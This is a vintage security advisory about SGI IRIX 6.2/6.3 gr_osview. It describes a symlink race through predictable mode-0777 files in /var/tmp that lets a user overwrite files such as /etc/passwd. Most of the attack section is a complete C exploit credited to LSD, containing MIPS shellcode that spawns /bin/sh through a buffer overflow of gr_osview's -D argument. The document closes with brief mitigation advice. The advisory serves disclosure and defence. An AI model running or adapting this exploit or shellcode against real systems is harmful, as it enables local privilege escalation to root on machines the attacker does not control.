COMMAND
chost/gr_osview
SYSTEMS AFFECTED
IRIX 6.2, 6.3
PROBLEM
Klaus found following. The SGI osview GUI tools are victim to
another familiar Un*x security bug. When invoked by a privileged
user, the osview tools (available under the /usr/Cadmin/bin/chost
GUI or System -> System Manager from the toolchest app.) will
create predictable files in /var/tmp, with mode 0777. These tools
create files in /var/tmp using the syntax IP-address.osview.system
For instance,
-rwxrwxrwx 1 root sys 12 Nov 20 13:13 192.24.42.12.os.cpu
-rwxrwxrwx 1 root sys 34 Nov 20 13:13 192.24.42.12.osview.disk
-rwxrwxrwx 1 root sys 107 Nov 20 13:13 192.24.42.12.osview.gen
-rwxrwxrwx 1 root sys 31 Nov 20 13:13 192.24.42.12.osview.net
A clever user can dupe a sysadmin into overwriting any supposedly
protected file on the system, such as, say, /etc/passwd, or /unix.
Along with it, the associated mayhem. Symlink an important file
to one of those, wait for a privileged user to run the appropriate
program, and...
aruba 60# more /etc/passwd
disk(/)
disk(/disk2)
disk(/disk6)
aruba 61#
Here is the exploit by LSD:
/*## copyright LAST STAGE OF DELIRIUM jan 1997 poland *://lsd-pl.net/ #*/
/*## /usr/sbin/gr_osview #*/
#define NOPNUM 3000
#define ADRNUM 3000
#define PCHNUM 1024
#define ALLIGN 1
char shellcode[]=
"\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */
"\x24\x02\x03\xf3" /* li $v0,1011 */
"\x23\xff\x01\x14" /* addi $ra,$ra,276 */
"\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */
"\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */
"\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */
"\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */
"\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */
"\x03\xff\xff\xcc" /* syscall */
"/bin/sh"
;
char jump[]=
"\x03\xa0\x10\x25" /* move $v0,$sp */
"\x03\xe0\x00\x08" /* jr $ra */
;
char nop[]="\x24\x0f\x12\x34";
main(int argc,char **argv){
char buffer[10000],adr[4],pch[4],*b;
int i;
printf("copyright LAST STAGE OF DELIRIUM jan 1997 poland //lsd-pl.net/\n");
printf("/usr/sbin/gr_osview for irix 6.2 6.3 IP:17,19,20,21,22,32\n\n");
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10256+1500+1024+3000;
*((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10256+1500+1024+32636;
b=buffer;
for(i=0;i<ALLIGN;i++) *b++=0xff;
for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
*b=0;
execl("/usr/sbin/gr_osview","lsd","-D",buffer,0);
}
SOLUTION
These files are created to instruct gr_osview what quantities to
monitor on a running system. Apart from waiting for SGI to change
the way gr_osview opens/creates files (O_CREAT|O_EXCL|O_RDONLY) on
the open, and a less generous creation mask (0444 would do just as
well), the only solution is to disable gr_osview entirely.